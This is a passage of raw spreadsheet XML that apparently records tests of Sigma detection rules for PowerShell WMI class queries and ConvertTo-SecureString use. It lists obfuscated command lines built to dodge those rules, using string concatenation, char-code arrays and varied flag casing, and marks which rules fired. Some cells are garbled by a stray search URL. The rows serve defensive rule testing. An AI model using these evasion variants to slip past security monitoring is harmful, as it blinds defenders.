          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1949" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1949" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1949" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1949" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1949" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1949" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1949" s="44" t="n"/>
      <c r="J1949" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1949" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1950" ht="15.75" customHeight="1" s="42">
      <c r="A1950" s="43" t="n"/>
      <c r="B1950" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1950" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1950" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1950" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmANd "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1950" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1950" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1950" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1950" s="44" t="n"/>
      <c r="J1950" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1950" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1951" ht="15.75" customHeight="1" s="42">
      <c r="A1951" s="43" t="n"/>
      <c r="B1951" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1951" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1951" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1951" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1951" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1951" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1951" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1951" s="43" t="n"/>
      <c r="J1951" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1951" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1952" ht="15.75" customHeight="1" s="42">
      <c r="A1952" s="43" t="n"/>
      <c r="B1952" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1952" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1952" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1952" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commANd "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1952" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1952" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1952" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1952" s="43" t="n"/>
      <c r="J1952" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1952" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1953" ht="15.75" customHeight="1" s="42">
      <c r="A1953" s="43" t="n"/>
      <c r="B1953" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1953" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1953" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1953" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1953" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1953" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1953" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1953" s="44" t="n"/>
      <c r="J1953" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1953" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1954" ht="15.75" customHeight="1" s="42">
      <c r="A1954" s="43" t="n"/>
      <c r="B1954" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1954" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1954" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1954" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAND "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1954" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1954" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1954" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1954" s="44" t="n"/>
      <c r="J1954" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1954" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1955" ht="15.75" customHeight="1" s="42">
      <c r="A1955" s="43" t="n"/>
      <c r="B1955" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1955" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1955" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1955" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -commAnD "$w='Win32\_'; $p='Process'; Get-CimInstance -ClassName ($w+$p)"</t>
        </is>
      </c>
      <c r="F1955" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1955" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1955" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1955" s="44" t="n"/>
      <c r="J1955" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1955" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1956" ht="15.75" customHeight="1" s="42">
      <c r="A1956" s="43" t="n"/>
      <c r="B1956" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1956" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1956" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1956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956" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1956" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1956" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1956" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1956" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1956" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1957" ht="15.75" customHeight="1" s="42">
      <c r="A1957" s="43" t="n"/>
      <c r="B1957" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1957" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1957" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1957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957" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1957" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1957" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1957" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1957" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1957" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1958" ht="15.75" customHeight="1" s="42">
      <c r="A1958" s="43" t="n"/>
      <c r="B1958" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1958" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1958" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1958" s="44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F1958" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1958" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1958" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1958" s="44" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1958" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1958" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1959" ht="15.75" customHeight="1" s="42">
      <c r="A1959" s="43" t="n"/>
      <c r="B1959" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1959" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1959" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1959" s="44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959" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1959" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1959" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1959" s="43" t="inlineStr">
        <is>
          <t>Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a); Base64 Encoded PowerShell Command Detected (e32d4572-9826-4738-b651-95fa63747e8a)</t>
        </is>
      </c>
      <c r="J1959" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1959" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1960" ht="15.75" customHeight="1" s="42">
      <c r="A1960" s="43" t="n"/>
      <c r="B1960" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1960" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1960" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1960" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1960" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1960" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1960" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1960" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1960" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1960" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1961" ht="15.75" customHeight="1" s="42">
      <c r="A1961" s="43" t="n"/>
      <c r="B1961" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1961" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1961" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1961" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1961" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1961" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1961" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1961" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1961" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1961" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1962" ht="15.75" customHeight="1" s="42">
      <c r="A1962" s="43" t="n"/>
      <c r="B1962" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1962" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1962" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1962" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommanD "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1962" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1962" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1962" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1962" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1962" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1962" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1963" ht="15.75" customHeight="1" s="42">
      <c r="A1963" s="43" t="n"/>
      <c r="B1963" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1963" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1963" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1963" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMmAnd "Get-WmiObject -Class ([char[]](https://www.google.com/search?q=87,105,110,51,50,95,80,114,111,99,101,115,115) -join '')"</t>
        </is>
      </c>
      <c r="F1963" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1963" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1963" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1963" s="43" t="inlineStr">
        <is>
          <t>Potential Encoded PowerShell Patterns In CommandLine (cdf05894-89e7-4ead-b2b0-0a5f97a90f2f)</t>
        </is>
      </c>
      <c r="J1963" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1963" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1964" ht="15.75" customHeight="1" s="42">
      <c r="A1964" s="43" t="n"/>
      <c r="B1964" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1964" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1964" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1964" s="4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964" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1964" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1964" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1964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964" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1964" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1965" ht="15.75" customHeight="1" s="42">
      <c r="A1965" s="43" t="n"/>
      <c r="B1965" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1965" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1965" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1965" s="44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965" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1965" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1965" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1965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965" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1965" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1966" ht="15.75" customHeight="1" s="42">
      <c r="A1966" s="43" t="n"/>
      <c r="B1966" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1966" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1966" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1966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966" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1966" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1966" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1966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966" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1966" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1967" ht="15.75" customHeight="1" s="42">
      <c r="A1967" s="43" t="n"/>
      <c r="B1967" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1967" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1967" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1967" s="44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967" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1967" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1967" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1967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967" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1967" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1968" ht="15.75" customHeight="1" s="42">
      <c r="A1968" s="43" t="n"/>
      <c r="B1968" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1968" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1968" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1968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968" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1968" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1968" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1968" s="44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968" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1968" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1969" ht="15.75" customHeight="1" s="42">
      <c r="A1969" s="43" t="n"/>
      <c r="B1969" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1969" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1969" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1969" s="44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969" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1969" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1969" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1969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969" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1969" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1970" ht="15.75" customHeight="1" s="42">
      <c r="A1970" s="43" t="n"/>
      <c r="B1970" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1970" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1970" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1970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970" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1970" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1970" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1970" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1970" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1970" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1971" ht="15.75" customHeight="1" s="42">
      <c r="A1971" s="43" t="n"/>
      <c r="B1971" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1971" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1971" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1971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971" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1971" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1971" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1971" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1971" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1971" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1972" ht="15.75" customHeight="1" s="42">
      <c r="A1972" s="43" t="n"/>
      <c r="B1972" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1972" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1972" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1972" s="44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F1972" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1972" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1972" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1972" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1972" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1972" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1973" ht="15.75" customHeight="1" s="42">
      <c r="A1973" s="43" t="n"/>
      <c r="B1973" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C1973" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D1973" s="44" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E1973" s="44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973" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1973" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1973" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1973" s="44" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded Invoke Keyword (6385697e-9f1b-40bd-8817-f4a91f40508e); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1973" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1973" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1974" ht="15.75" customHeight="1" s="42">
      <c r="A1974" s="43" t="n"/>
      <c r="B1974" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1974" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1974" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1974" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1974" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1974" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1974" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1974" s="44" t="n"/>
      <c r="J1974" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1974" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1975" ht="15.75" customHeight="1" s="42">
      <c r="A1975" s="43" t="n"/>
      <c r="B1975" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1975" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1975" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1975" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1975" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1975" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1975" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1975" s="44" t="n"/>
      <c r="J1975" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1975" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1976" ht="15.75" customHeight="1" s="42">
      <c r="A1976" s="43" t="n"/>
      <c r="B1976" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1976" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1976" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1976" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CommaNd "$a='ConvertTo-'; $b='SecureString'; $c=$a+$b; &amp;$c -String 'MySecret' -AsPlainText -Force"</t>
        </is>
      </c>
      <c r="F1976" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1976" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1976" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1976" s="44" t="n"/>
      <c r="J1976" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1976" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1977" ht="15.75" customHeight="1" s="42">
      <c r="A1977" s="43" t="n"/>
      <c r="B1977" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cmdline_convertto_securestring</t>
        </is>
      </c>
      <c r="C1977" s="44" t="inlineStr">
        <is>
          <t>ConvertTo-SecureString Cmdlet Usage Via CommandLine</t>
        </is>
      </c>
      <c r="D1977" s="44" t="inlineStr">
        <is>
          <t>74403157-20f5-415d-89a7-c505779585cf</t>
        </is>
      </c>
      <c r="E1977" s="44" t="inlineStr">
        <is>
